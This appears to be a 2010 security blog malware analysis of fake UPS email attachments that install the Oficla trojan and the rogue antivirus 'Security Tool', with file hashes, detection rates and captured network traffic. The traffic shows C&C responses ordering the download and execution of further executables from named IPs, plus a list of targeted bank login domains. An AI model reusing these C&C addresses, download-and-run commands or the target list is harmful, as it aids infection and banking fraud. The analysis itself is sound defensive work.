Fake UPS ZIP Attachments Spreads Oficla Trojan
Some users have submitted us few malware samples, received as attachments in email addresses related to fake UPS spam emails. The files are ZIP archives that contain an executable file that has the same icon as Microsoft Words documents:
File: Label_UPS_Nr11373.exe
Size: 60928 bytes
Publisher: WUsBjuKspHvMxtas
MD5 hash: ed691cabda1bc5f8447d747558f8b64e
SHA1 hash: 73dee84ca24c24533fdda34e958c4c4c2f635ddf
Detection rate: 5 on 16 (31%)
Status: INFECTED
Files created after the execution of the EXE file:
File name: svrwsc-exe
File size: 62464 bytes
MD5 hash: c5ebdc1c45aec27d935a30e74197d402
SHA1 hash: 44c56444557870316389b86c10343beea3245af1
Detection rate: 2 on 16 (13%)
Status: INFECTED
File name: sbxj-lyo
File size: 21504 bytes
MD5 hash: a0528b57e251657ce64e79acfcb45c0a
SHA1 hash: 15df2b7cfda011876e5a3bfca6014390c1b16a2b
Detection rate: 2 on 16 (13%)
Status: INFECTED
File name: ex-08-exe
File size: 259072 bytes
MD5 hash: 3996c77ef6a0b4f365f4d8297bd46c44
SHA1 hash: 05c869267cff02ad999c08565fbe1f266c91a9c0
Detection rate: 2 on 16 (13%)
Status: INFECTED
The file that has been created in system directory is named sbxj.lyo and it is the main executable file of the Oficla trojan that is used to control the victim’s computer and to install the rogue security software named Security Tool.
Network Traffic:
GET /mydog/bb.php?v=200&id=XXX&b=13oktabr&tm=2 HTTP/1.1 User-Agent: Opera\9.64 Host: webauc. ru |
Response:
[info]runurl:hxxp://91.204.48.46 /test/morph.exe|taskid:16|delay:15|upd:0|backurls:[/info] |
Network Traffic:
GET /test/morph.exe HTTP/1.1 User-Agent: Opera\9.64 Host: 91.204.48.46 |
Response:
HTTP/1.1 200 OK Date: Wed, 20 Oct 2010 15:58:45 GMT Content-Disposition: attachment; filename="morph.exe" Content-Transfer-Encoding: binary Content-Length: 62464 Content-Type: application/octet-stream |
Network Traffic:
GET /mydog/bb.php?v=200&id=XXX&tid=16&b=13oktabr&r=1&tm=2 HTTP/1.1 User-Agent: Opera\9.64 Host: webauc. ru |
Response:
[info]kill:0|runurl:http://91.204.48.46 /test/69.exe|taskid:13|delay:15|upd:0|backurls:[/info] |
Network Traffic:
GET /test/69.exe HTTP/1.1 User-Agent: Opera\9.64 Host: 91.204.48.46 |
Response:
HTTP/1.1 200 OK Date: Wed, 20 Oct 2010 15:58:47 GMT Content-Disposition: attachment; filename="69.exe" Content-Transfer-Encoding: binary Content-Length: 15360 Content-Type: application/octet-stream |
From the above network traffic we can see that the main executable file of Oficla trojan has started to receive commands from the C&C server to download two new malicious executable files, named morph.exe and 69.exe, and to execute the newly downloaded files in the victim’s computer.
Network Traffic:
GET /avpsoft_dfhljkghsdflg.exe HTTP/1.0 Host: 188.65.74.163 |
Response:
HTTP/1.1 200 OK Date: Wed, 20 Oct 2010 15:57:46 GMT Content-Type: application/octet-stream Content-Length: 987648 Last-Modified: Wed, 20 Oct 2010 15:57:32 GMT |
The file avpsoft_dfhljkghsdflg.exe is the executable of the rogue security software, that will be installed in our infected system, named Security Tool. After its execution, we noticed new popup windows come up:
Security Tool has been fully installed:
Files created during the installation of Security Tool:
Documents and Settings\user\Local Settings\Application Data\2730621030.exe Documents and Settings\user\Start Menu\Programs\Security Tool.lnk |
File name: 2730621030-exe
File size: 987648 bytes
MD5 hash: 493366362d69acf11996d96e33fabd65
SHA1 hash: 5f3a4dbb6a139c21eac250e61587562d1e24ac82
Detection rate: 2 on 16 (13%)
Status: INFECTED
Network Traffic:
POST /us/federal/index.php HTTP/1.0 Accept: */* Host: padreim. ru |
Response:
HTTP/1.1 200 OK Content-Type: text/html Content-Length: 6191 .%......L.....*ebc_ebc1961*......*cibng.ibanking-services.com*......*springbankconnect.com*......*ibanking-services.com*......*mystreetscape.com*......*/inets/Login*......*business.macu.com*......*cnbsec1.cnbank.com*.. ...*cnbank.com*......*scottvalleybank*......*hillsbank*.. ...*efirstbank*......*addisonavenue.com*......*secure.fundsxpress.com*......*site-secure.com*......*umpquabank.com*......*fundsxpress.com*......*mystreetscape*......*treasurypathways.com*......*secure.ally.com*......*bankonline.umpquabank.com*......*servlet/teller*.. ...*nsbank.com*......*comerica.com*......*cashmgt.firsttennessee*......*securentry.calbanktrust.com*.. ...*securentry*......*express.53.com*......*homebank.nbg.gr*......*online.ccbank.bg*......*hsbc*......*ebanking.eurobank.gr*......*itreasury.regions.com*......*/Common/SignOn/Start.asp*......*wellsoffice.wellsfargo.com*......*chsec.wellsfargo.com*.. ...*telepc.net*......*ceowt.wellsfargo.com*......*enterprise2.openbank.com*......*global1.onlinebank.com*.. ...*webexpress*......*/sbuser/*.. ...*webcash*......*www2.firstbanks.com/olb*.. ...*bxs.com*......*PassMarkRecognized.aspx*......*businesslogin*.. ...*hbcash.exe*......*otm.suntrust.com*......*wire*......*ACH*.. ...*/inets/*.. ...*corpACH*......*wcmfd/wcmpw/*.. ...*/IBWS/*......*/ibs.*.. ...*/livewire/*.. ...*/olbb/*......*singlepoint.usbank.com*......*bolb.associatedbank.com*..*...*fnfgbusinessonline.enterprisebanker.com*......*lakecitybank.webcashmgmt.com*.. ...*/inets/*......*bob.sovereignbank.com |
The malware want to filter domains related to bank accounts…
Network Traffic:
GET /outlook.exe HTTP/1.0 Host: 109.196.143.135 |
Response:
HTTP/1.1 200 OK Server: nginx/0.8.34 Date: Wed, 20 Oct 2010 15:57:51 GMT Content-Type: application/octet-stream Content-Length: 259072 Last-Modified: Wed, 20 Oct 2010 15:08:46 GMT Accept-Ranges: bytes |
Security Tool try to connect to a fraudulent payment system:
GET /buy.php?q=0a70fbd0279e74fbaa0e7469ec5182ba HTTP/1.1 Host: fastpayform. biz |
The title of the HTML page is:
<title>Security Tool - Payment Page</title> |
Network Traffic:
GET /cb_soft.php?q=0a70fbd0279e74fbaa0e7469ec5182ba HTTP/1.1 Host: 77.78.201.23 |
Domain & IP Analysis:
webauc. ru – 85.195.104.162
91.204.48.46 – -
188.65.74.163 – -
109.196.143.135 – -
fastpayform. biz – 195.3.145.46
77.78.201.23 – b201c23.pptp-gw51.cable-internet.GlobalNET.ba
